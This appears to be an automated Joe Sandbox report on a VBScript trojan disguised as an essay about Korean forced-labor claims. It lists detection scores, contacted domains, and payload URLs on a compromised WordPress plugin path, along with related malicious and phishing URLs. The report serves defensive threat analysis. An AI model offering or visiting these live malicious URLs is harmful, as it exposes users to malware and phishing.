Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Essay on Resolution of Korean Forced Labor Claims.vbs	21%	ReversingLabs	Win32.Trojan.Valyria
Essay on Resolution of Korean Forced Labor Claims.vbs	24%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
recaptcha.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://www.gstatic.c..?/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__.	0%	URL Reputation	safe
https://recaptcha.net	0%	URL Reputation	safe
https://cct.google/taggy/agent.js	0%	URL Reputation	safe
https://www.google.%/ads/ga-audiences	0%	URL Reputation	safe
https://www.merchant-center-analytics.goog	0%	URL Reputation	safe
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/r.php	0%	Virustotal		Browse
https://makeoversalon.net.in/	0%	Virustotal		Browse
https://recaptcha.net/recaptcha/api.js	0%	Virustotal		Browse
https://recaptcha.net/recaptcha/api2/	0%	Virustotal		Browse
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php33	0%	Virustotal		Browse
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-im	0%	Virustotal		Browse
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
admin.bitninja.io	104.26.14.182	true	false		high
a.nel.cloudflare.com	35.190.80.1	true	false		high
analytics-alv.google.com	216.239.38.181	true	false		high
www.google.com	172.253.124.147	true	false		high
recaptcha.net	74.125.136.94	true	false	0%, Virustotal, Browse	unknown
makeoversalon.net.in	5.9.123.217	true	true		unknown
stats.g.doubleclick.net	74.125.136.154	true	false		high
analytics.google.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/r.php	true	0%, Virustotal, Browse	unknown
about:blank	false		low
https://recaptcha.net/recaptcha/api2/anchor?ar=1&k=6LdvpRAUAAAAAJkr4psZnXC4TeOEVPwP_bEQrP24&co=aHR0cHM6Ly9tYWtlb3ZlcnNhbG9uLm5ldC5pbjo0NDM.&hl=en&v=rz4DvU-cY2JYCwHSTck0_qm-&size=normal&cb=edwdsq8773jn	false		unknown
https://makeoversalon.net.in/favicon.ico	true		unknown
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx	false		unknown
https://www.google.com/ads/ga-audiences?t=sr&aip=1&_r=4&slf_rd=1&v=1&_v=j101&tid=UA-1975075-20&cid=1276044083.1713594250&jid=1814692829&_u=YEBAAUAAAAAAACAAI~&z=711350274	false		high
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php	true	0%, Virustotal, Browse	unknown
https://admin.bitninja.io/cookieimg.php	false		high
https://a.nel.cloudflare.com/report/v4?s=YI1gzvi8TrNbcxLsvVAUhO1Innrxl9xm34Ag%2B5wEUF8HpZVSgNuefVkS1FOqMCFGL7F%2FE2RAlcrT3Sc3WIKNz3HgepR5cLMQAQnnWVjUIlx%2BpV4q%2BSJn7NcmTCP6DFxa6LX1	false		high
https://www.google.com/js/bg/rIjZlM8ZNfOeVQTojtt5OPuY9YnE0CAT82tG0V-YUX0.js	false		high
https://stats.g.doubleclick.net/g/collect?v=2&tid=G-M2RCV3G3BZ&cid=1276044083.1713594250&gtm=45je44h0v9139052269za200&aip=1&dma=0&gcd=13l3l3l3l1&npa=0	false		high
https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-1975075-20&cid=1276044083.1713594250&jid=1814692829&gjid=287345157&_gid=1937593962.1713594250&_u=YEBAAUAAAAAAACAAI~&z=981243278	false		high
https://recaptcha.net/recaptcha/api2/bframe?hl=en&v=rz4DvU-cY2JYCwHSTck0_qm-&k=6LdvpRAUAAAAAJkr4psZnXC4TeOEVPwP_bEQrP24	false		unknown
https://analytics.google.com/g/collect?v=2&tid=G-M2RCV3G3BZ&gtm=45je44h0v9139052269za200&_p=1713594248481&_gaz=1&gcd=13l3l3l3l1&npa=0&dma=0&cid=1276044083.1713594250&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&pscdl=noapi&_eu=AAAI&_s=1&sid=1713594250&sct=1&seg=0&dl=https%3A%2F%2Fmakeoversalon.net.in%2Fwp-content%2Fplugins%2Fwp-custom-taxonomy-image%2Fiiri%2Fshare.docx&dr=https%3A%2F%2Fmakeoversalon.net.in%2Fwp-content%2Fplugins%2Fwp-custom-taxonomy-image%2Fiiri%2Fshare.docx&dt=Visitor%20anti-robot%20validation&en=page_view&_fv=1&_ss=1&tfd=3102	false		high
https://analytics.google.com/g/collect?v=2&tid=G-M2RCV3G3BZ&gtm=45je44h0v9139052269za200&_p=1713594248481&gcd=13l3l3l3l1&npa=0&dma=0&cid=1276044083.1713594250&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&pscdl=noapi&_eu=AAAI&_s=2&sid=1713594250&sct=1&seg=0&dl=https%3A%2F%2Fmakeoversalon.net.in%2Fwp-content%2Fplugins%2Fwp-custom-taxonomy-image%2Fiiri%2Fshare.docx&dr=https%3A%2F%2Fmakeoversalon.net.in%2Fwp-content%2Fplugins%2Fwp-custom-taxonomy-image%2Fiiri%2Fshare.docx&dt=Visitor%20anti-robot%20validation&en=screen_view&_ee=1&ep.screen_name=Captcha%20Page&tfd=8185	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://stats.g.doubleclick.net/g/collect	chromecache_58.7.dr	false		high
https://developers.google.com/recaptcha/docs/faq#localhost_support	chromecache_57.7.dr, chromecache_62.7.dr	false		high
https://recaptcha.net/recaptcha/api.js	wscript.exe, 00000000.00000003.1757741056.0000022AC5E50000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://recaptcha.net/recaptcha/api2/	chromecache_67.7.dr	false	0%, Virustotal, Browse	unknown
https://makeoversalon.net.in/	wscript.exe, 00000000.00000002.1759178536.0000022AC3C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757521098.0000022AC3C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1760015537.0000022AC6680000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757235721.0000022AC3C8D000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docxV	explorer.exe, 00000004.00000002.2301180539.0000000000B86000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2300646799.0000000000B85000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.google.com/recaptcha#6262736	chromecache_57.7.dr, chromecache_62.7.dr	false		high
https://makeoversalon.net.in/uage:	wscript.exe, 00000000.00000002.1759807591.0000022AC5CE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756381491.0000022AC5CDF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.phpe?	wscript.exe, 00000000.00000002.1759784200.0000022AC5CD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756399890.0000022AC5CC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756527502.0000022AC5CCF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx(eK3	explorer.exe, 00000004.00000002.2301016804.0000000000B60000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ampcid.google.com/v1/publisher:getClientId	chromecache_61.7.dr	false		high
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.phpY8	wscript.exe, 00000000.00000002.1759784200.0000022AC5CD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756399890.0000022AC5CC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756527502.0000022AC5CCF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.gstatic.c..?/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__.	chromecache_57.7.dr, chromecache_62.7.dr	false	URL Reputation: safe	low
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docxH	explorer.exe, 00000004.00000003.2300805746.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2301140793.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.google.com/recaptcha/?hl=en#6223828	chromecache_57.7.dr, chromecache_62.7.dr	false		high
https://cloud.google.com/contact	chromecache_57.7.dr, chromecache_62.7.dr	false		high
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docxD	explorer.exe, 00000004.00000003.2300805746.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2301140793.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docxll	explorer.exe, 00000004.00000002.2301016804.0000000000B60000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com	chromecache_58.7.dr, chromecache_66.7.dr	false		high
https://support.google.com/recaptcha/#6175971	chromecache_57.7.dr, chromecache_62.7.dr	false		high
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php1y	wscript.exe, 00000000.00000002.1760015537.0000022AC6680000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.phpq8	wscript.exe, 00000000.00000002.1759784200.0000022AC5CD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756399890.0000022AC5CC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756527502.0000022AC5CCF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://stats.g.doubleclick.net/j/collect	chromecache_61.7.dr	false		high
https://makeoversalon.net.in/RL-	wscript.exe, 00000000.00000002.1759178536.0000022AC3C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757521098.0000022AC3C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757235721.0000022AC3C8D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php33	wscript.exe, 00000000.00000003.1693830385.0000022AC5A3F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.google.com/recaptcha/api2/	chromecache_57.7.dr, chromecache_62.7.dr	false		high
https://support.google.com/recaptcha	chromecache_62.7.dr	false		high
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docxd	explorer.exe, 00000004.00000002.2301016804.0000000000B60000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/r.phpw	wscript.exe, 00000000.00000003.1756695458.0000022AC3CDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1759344841.0000022AC3CDD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php4aZF$	wscript.exe, 00000000.00000003.1757757779.0000022AC5E45000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bitninja.io	wscript.exe, 00000000.00000003.1742392823.0000022AC5D1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1758237969.0000022AC5D17000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742879491.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742572781.0000022AC5D17000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742392823.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1757757779.0000022AC5E45000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1743103250.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756206708.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cloud.google.com/recaptcha-enterprise/billing-information	chromecache_57.7.dr, chromecache_62.7.dr	false		high
https://recaptcha.net	chromecache_62.7.dr	false	URL Reputation: safe	unknown
https://tagassistant.google.com/	chromecache_61.7.dr	false		high
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-im	wscript.exe, 00000000.00000002.1759472586.0000022AC3E39000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1743103250.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1758636562.0000022AC5A14000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
https://adservice.google.com/pagead/regclk	chromecache_58.7.dr	false		high
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/r.phpj6	wscript.exe, 00000000.00000002.1759784200.0000022AC5CD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756399890.0000022AC5CC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742695487.0000022AC5CCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756527502.0000022AC5CCF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cct.google/taggy/agent.js	chromecache_58.7.dr, chromecache_66.7.dr	false	URL Reputation: safe	unknown
https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que	chromecache_57.7.dr, chromecache_62.7.dr	false		high
https://play.google.com/log?format=json&hasfast=true	chromecache_62.7.dr	false		high
https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca	chromecache_57.7.dr, chromecache_62.7.dr	false		high
https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/r.phpT	wscript.exe, 00000000.00000003.1756695458.0000022AC3CDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1759344841.0000022AC3CDD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/ads/ga-audiences	chromecache_61.7.dr	false		high
https://www.google.%/ads/ga-audiences	chromecache_61.7.dr	false	URL Reputation: safe	low
https://td.doubleclick.net	chromecache_58.7.dr, chromecache_66.7.dr	false		high
https://www.merchant-center-analytics.goog	chromecache_58.7.dr	false	URL Reputation: safe	unknown
https://stats.g.doubleclick.net/g/collect?v=2&	chromecache_58.7.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.14.182	admin.bitninja.io	United States	13335	CLOUDFLARENETUS	false
74.125.136.106	unknown	United States	15169	GOOGLEUS	false
216.239.38.181	analytics-alv.google.com	United States	15169	GOOGLEUS	false
172.253.124.106	unknown	United States	15169	GOOGLEUS	false
172.253.124.147	www.google.com	United States	15169	GOOGLEUS	false
64.233.177.157	unknown	United States	15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
5.9.123.217	makeoversalon.net.in	Germany	24940	HETZNER-ASDE	true
142.250.105.104	unknown	United States	15169	GOOGLEUS	false
104.26.15.182	unknown	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
74.125.136.154	stats.g.doubleclick.net	United States	15169	GOOGLEUS	false
64.233.185.147	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1429035
Start date and time:	2024-04-20 08:23:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Essay on Resolution of Korean Forced Labor Claims.vbs
Detection:	MAL
Classification:	mal88.troj.evad.winVBS@23/25@29/14
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 64.233.185.94, 64.233.176.101, 64.233.176.138, 64.233.176.102, 64.233.176.100, 64.233.176.139, 64.233.176.113, 142.250.9.84, 34.104.35.123, 74.125.136.97, 64.233.177.94, 173.194.219.100, 173.194.219.113, 173.194.219.139, 173.194.219.138, 173.194.219.101, 173.194.219.102, 74.125.136.95, 173.194.219.95, 172.253.124.95, 74.125.138.95, 142.251.15.95, 108.177.122.95, 64.233.177.95, 142.250.9.95, 172.217.215.95, 142.250.105.95, 64.233.176.95, 64.233.185.95, 64.233.185.139, 64.233.185.138, 64.233.185.113, 64.233.185.102, 64.233.185.101, 64.233.185.100, 142.251.15.94, 172.253.124.94, 199.232.210.172, 192.229.211.108, 74.125.136.94
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, www.googletagmanager.com, update.googleapis.com, clients.l.google.com, www.gstatic.com, www.google-analytics.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.26.15.182	https://gtzenterprises.com.np/inag/?67368931	Get hash	malicious	Unknown	Browse
104.26.14.182	https://pgprolaundry.com/m1f/3qouegthi0o	Get hash	malicious	Phisher	Browse
104.26.14.182	https://gtzenterprises.com.np/inag/?67368931	Get hash	malicious	Unknown	Browse
239.255.255.250	https://prayas.co/assets/nagateliteqfuk.exe	Get hash	malicious	Unknown	Browse
	https://bj8lt4fm8evwyl.pages.dev/smart89/	Get hash	malicious	Unknown	Browse
	https://28.104-168-101-28.cprapid.com/Pay-PaI/	Get hash	malicious	PayPal Phisher	Browse
	https://jainpokliultachor.pages.dev/	Get hash	malicious	Unknown	Browse
	https://sharma-sanjana2108.github.io/Microsoft/	Get hash	malicious	Unknown	Browse
	https://pusha1qsn.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse
	https://19apmacc8.z13.web.core.windows.net/	Get hash	malicious	Unknown	Browse
	https://eshoradebitcoin.com/3.dat	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	https://kajdbhfkjahsdifhi.z19.web.core.windows.net/Er0Win8helpline76/index.html	Get hash	malicious	Unknown	Browse
	https://loo54.z11.web.core.windows.net/werrx01USAHTML/?bcda=1-844-621-0495	Get hash	malicious	TechSupportScam	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
recaptcha.net	http://ranchpools.com	Get hash	malicious	Unknown	Browse	64.233.177.94
	https://kristie-mancell-s-school.teachable.com/p/centerforfamilylife	Get hash	malicious	Unknown	Browse	142.251.15.94
	http://zacharryblogs.com	Get hash	malicious	Unknown	Browse	64.233.177.94
	https://sociallinks.lt.acemlnb.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZzb2NpYWxsaW5rcy5pbyUyRm9zaW50LXdlYmluYXJzJTJGd2ViaW5hci1lbmhhbmNpbmctYW1sLWludmVzdGlnYXRpb25zLXdpdGgtb3NpbnQlM0Z1dG1fc291cmNlJTNEZW1haWwlMjZ1dG1fbWVkaXVtJTNEd2ViaW5hciUyNnV0bV9jYW1wYWlnbiUzRGFtbF8wNF8yNA==&sig=bEXSTLMngghhoUjnhUiGrKrf6GsWGU1eAwJ54z8GbBH&iat=1712921684&a=%7C%7C612077526%7C%7C&account=sociallinks%2Eactivehosted%2Ecom&email=I4809riumLU7t4jf%2BoK9uHOsQeuYYw6CYkuCsQDv%3AFRtI69CZolNJDOUhiGMO%2BO9bqaecpEWw&s=f7847248dd0f6e35d5eb6514571a7081&i=993A1018A3A5488	Get hash	malicious	Unknown	Browse	142.250.217.195
	https://sociallinks.lt.acemlnb.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZzb2NpYWxsaW5rcy5pbyUyRm9zaW50LXdlYmluYXJzJTJGd2ViaW5hci1lbmhhbmNpbmctYW1sLWludmVzdGlnYXRpb25zLXdpdGgtb3NpbnQlM0Z1dG1fc291cmNlJTNEZW1haWwlMjZ1dG1fbWVkaXVtJTNEd2ViaW5hciUyNnV0bV9jYW1wYWlnbiUzRGFtbF8wNF8yNA==&sig=bEXSTLMngghhoUjnhUiGrKrf6GsWGU1eAwJ54z8GbBH&iat=1712921684&a=%7C%7C612077526%7C%7C&account=sociallinks%2Eactivehosted%2Ecom&email=I4809riumLU7t4jf%2BoK9uHOsQeuYYw6CYkuCsQDv%3AFRtI69CZolNJDOUhiGMO%2BO9bqaecpEWw&s=f7847248dd0f6e35d5eb6514571a7081&i=993A1018A3A5488	Get hash	malicious	Unknown	Browse	142.250.72.99
	https://sociallinks.lt.acemlnb.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZzb2NpYWxsaW5rcy5pbyUyRm9zaW50LXdlYmluYXJzJTJGd2ViaW5hci1lbmhhbmNpbmctYW1sLWludmVzdGlnYXRpb25zLXdpdGgtb3NpbnQlM0Z1dG1fc291cmNlJTNEZW1haWwlMjZ1dG1fbWVkaXVtJTNEd2ViaW5hciUyNnV0bV9jYW1wYWlnbiUzRGFtbF8wNF8yNA==&sig=bEXSTLMngghhoUjnhUiGrKrf6GsWGU1eAwJ54z8GbBH&iat=1712921684&a=%7C%7C612077526%7C%7C&account=sociallinks%2Eactivehosted%2Ecom&email=I4809riumLU7t4jf%2BoK9uHOsQeuYYw6CYkuCsQDv%3AFRtI69CZolNJDOUhiGMO%2BO9bqaecpEWw&s=f7847248dd0f6e35d5eb6514571a7081&i=993A1018A3A5488	Get hash	malicious	Unknown	Browse	142.250.81.227
	https://www.virustotal.com/gui/url/de8f7b79404000be33ebfcb7f620b377f27e1440516ded17b2232b92a056bd64?nocache=1	Get hash	malicious	Unknown	Browse	172.253.62.94
	TR PAIEMANT VPROFORMA DE03060 d#U00e9part des colis + facture.msg	Get hash	malicious	Xmrig	Browse	142.251.167.94
	TR PAIEMANT VPROFORMA DE03060 d#U00e9part des colis + facture.msg	Get hash	malicious	Xmrig	Browse	172.253.62.94
	https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/?utm_source=tldrinfosec	Get hash	malicious	Unknown	Browse	142.250.217.227
admin.bitninja.io	https://pgprolaundry.com/m1f/3qouegthi0o	Get hash	malicious	Phisher	Browse	172.67.74.40
	https://gtzenterprises.com.np/inag/?67368931	Get hash	malicious	Unknown	Browse	104.26.15.182
	https://www.menti.com/ala5ma7w8eyg	Get hash	malicious	Unknown	Browse	188.114.96.7
	https://www.menti.com/ala5ma7w8eyg	Get hash	malicious	Unknown	Browse	188.114.96.7
	http://yourprdept.com.au/	Get hash	malicious	Unknown	Browse	104.26.13.94
	https://bs.serving-sys.com/Serving/adServer.bs?cn=brd&PluID=0&Pos=45940487&EyeblasterID=1086486580&clk=&ctick=4849&rtu=https%3A%2F%2Fmyad35.web.app/andrew.peeler@equiniti.com	Get hash	malicious	HTMLPhisher	Browse	104.26.13.94
	https://eu2signing.web.app/ghWO3lk17WO3nx0qsharkni2Pnjady9s3RWO3BM2	Get hash	malicious	HTMLPhisher	Browse	172.67.75.184
	https://abahrd.com/tracking/click?data=eyJldmVudCI6ICIkY2FtcGFpZ25fbGlua19jbGljayIsICJwcm9wZXJ0aWVzIjogeyJjYW1wYWlnbl9pZCI6IDE2MzU0NzY3MjEsICJkaXN0aW5jdF9pZCI6ICIxNjY1MDk2ODMzLTY0NjQ5NzU5MC0zNjQwNDQyOS0zODA5MTQwMzciLCAibWVzc2FnZV9pZCI6IDExODEwNjc3OSwgInRva2VuIjogImRkMjg5YzM2YjZmNDc4ZWVjNDZkZDk0OTk3ZDFiZTkyIiwgInR5cGUiOiAiZW1haWwiLCAidXJsIjogImh0dHBzOi8vYXVkaW9tYWNrLmNvbS93b3JsZC9wb3N0Lzk2In19&eih=i3yfivlbvjsly8emik94zuvtkpfth0qlgteeidgouxfi2jjehgla3t0xm8&next=aHR0cHM6Ly9lYm9ueWVzdGF0ZXMuY29tLy5pc3dlYXJjYW50Z2V0dG95b3VvcmNhbGx5b3UvaXRza2luZG9maGFyZHRvZ2V0dG9yZWFjaHlvdS9kcGE4ZXJmYW4zY3htLy9zZy1jcmVhdGl2ZUBiZWluLm5ldA==	Get hash	malicious	Unknown	Browse	104.26.12.94
	https://saqlainmushtaqheights.com/OUU.php?QIU=6	Get hash	malicious	Unknown	Browse	172.67.75.184
	doc_Factura_158598.html	Get hash	malicious	Unknown	Browse	104.26.12.94

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	VN24A02765.PDF.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	ShippingOrder_ GSHS2400052.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	qk9TaBBxh8.exe	Get hash	malicious	LummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.180.119
	SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	0OqTUkeaoD.exe	Get hash	malicious	RedLine	Browse	104.20.3.235
	https://bj8lt4fm8evwyl.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	172.66.47.24
	https://jainpokliultachor.pages.dev/	Get hash	malicious	Unknown	Browse	104.22.24.131
	https://pusha1qsn.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	104.21.53.38
	https://19apmacc8.z13.web.core.windows.net/	Get hash	malicious	Unknown	Browse	104.22.24.131
	https://loo54.z11.web.core.windows.net/werrx01USAHTML/?bcda=1-844-621-0495	Get hash	malicious	TechSupportScam	Browse	172.67.208.186
HETZNER-ASDE	0OqTUkeaoD.exe	Get hash	malicious	RedLine	Browse	116.203.6.63
	https://wetransfer.com/downloads/63408c72b6333965afb0118ce81f53d220240419112437/2452e85458854b24e1ec42e87285f82420240419112457/7d30d1?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgrid	Get hash	malicious	HTMLPhisher	Browse	95.217.208.255
	UPDATED SSTATEMENT OF ACCOUNT.exe	Get hash	malicious	AgentTesla	Browse	135.181.124.14
	REMITTANCE COPY.exe	Get hash	malicious	AgentTesla	Browse	135.181.124.14
	https://bestprizerhere.life/?u=3w8p605&o=pn1kfzq&t=pshtb_redirectUrl_body	Get hash	malicious	GRQ Scam	Browse	136.243.216.235
	New Soft Update.exe	Get hash	malicious	Unknown	Browse	116.203.164.39
	Oo2yeTdq5J.elf	Get hash	malicious	Mirai	Browse	88.198.32.246
	H8wnVxIEh6.elf	Get hash	malicious	Gafgyt, Mirai	Browse	197.242.86.246
	QXeoSsX87R.elf	Get hash	malicious	Gafgyt, Mirai	Browse	144.79.65.41
	3OcPSlVa7n.elf	Get hash	malicious	Mirai	Browse	168.119.31.114
CLOUDFLARENETUS	VN24A02765.PDF.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	ShippingOrder_ GSHS2400052.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.74.152
	qk9TaBBxh8.exe	Get hash	malicious	LummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.180.119
